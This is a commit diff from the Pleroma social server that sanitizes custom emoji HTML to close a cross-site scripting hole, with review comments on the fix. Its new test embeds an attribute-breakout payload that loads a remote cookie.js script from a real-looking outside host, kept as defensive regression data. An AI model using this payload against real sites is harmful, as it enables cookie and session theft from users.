formatter: don't add XSS emoji
authorWilliam Pitcock <nenolod@dereferenced.org>
Sun, 2 Sep 2018 00:04:09 +0000 (00:04 +0000)
committerWilliam Pitcock <nenolod@dereferenced.org>
Sun, 2 Sep 2018 00:04:09 +0000 (00:04 +0000)
lib/pleroma/formatter.ex
test/formatter_test.exs
test/web/twitter_api/representers/activity_representer_test.exs
test/web/twitter_api/views/user_view_test.exs

index cf2944c38fffa668ba6526dfd415af9ea10458ef..9be54e86358946644fd5e984671836982c38a4ab 100644 (file)
@@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do
           MediaProxy.url(file)
         }' />"
       )
+      |> HtmlSanitizeEx.basic_html()
     end)
   end
 
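Review bot: The `HtmlSanitizeEx.basic_html()` call added at L16 sanitizes the whole accumulated text after the emoji name has already been interpolated unescaped into the `alt`/`title`/`src` attributes (L13-L14), so the fix relies on the sanitizer's allowlist rather than on correct output encoding at the injection point; escaping `emoji` (and the `MediaProxy.url(file)` value) with the project's HTML-escape helper before interpolation would close the attribute breakout regardless of what the sanitizer permits, and the sanitizer can then stay as defense in depth. Because the call sits inside the reduce callback (the enclosing `emojify` reduce starts outside this hunk), the full text is re-parsed and re-serialized once per emoji entry rather than once, and it is never run when the emoji map is empty, so callers must not treat `emojify/2` as a general sanitization step. The re-serialization also rewrites quoting of any HTML already in `text`, which is why three test expectations in this commit changed from single to double quotes; a short comment such as `# basic_html re-serializes the whole text; attribute quoting in the output is the sanitizer's, not ours` would spare the next maintainer that surprise.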
index 95558089bd784f2720b978eafa41040d2dd1e243..8453b72ac4b08cd7c3fdbf1c9c247ddcb5ea12c0 100644 (file)
@@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do
     text = "I love :moominmamma:"
 
     expected_result =
-      "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+      "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
 
     assert Formatter.emojify(text) == expected_result
   end
 
+  test "it does not add XSS emoji" do
+    text =
+      "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+    custom_emoji = %{
+      "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+        "https://placehold.it/1x1"
+    }
+
+    expected_result =
+      "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+    assert Formatter.emojify(text, custom_emoji) == expected_result
+  end
+
   test "it returns the emoji used in the text" do
     text = "I love :moominmamma:"
 
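Review bot: The new test at L31-L44 pins the sanitizer's exact re-serialized output (`alt=""`, double quotes, attribute order), which will break on any HtmlSanitizeEx upgrade that changes serialization while never directly stating the property being guarded. Add negative assertions alongside it so the regression check survives serialization changes: `refute Formatter.emojify(text, custom_emoji) =~ "onerror"`, `refute Formatter.emojify(text, custom_emoji) =~ "onload"`, and `refute Formatter.emojify(text, custom_emoji) =~ "<script"`. The payload at L33 and L36 also embeds what looks like a live third-party callback host (`51.15.235.162.xip.io`); a reserved name such as `attacker.example` or `example.invalid` conveys the same intent without shipping a real hostname in the test suite.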
index 3f85e028ba87ff62f8bb8be6b9d7e5ebaf9370f4..894d2004998d872e37e7e638c2fc5f63d069700b 100644 (file)
@@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
     }
 
     expected_html =
-      "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
+      "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
         mentioned_user.ap_id
       }\">@shp</a>"
 
index 24a5c5bca4f51453812d53687c4174750b00c3e3..7075a237090f1c1dba050c16eac3332ce92d451a 100644 (file)
@@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
 
   test "A user with emoji in username", %{user: user} do
     expected =
-      "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
+      "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
 
     user = %{
       user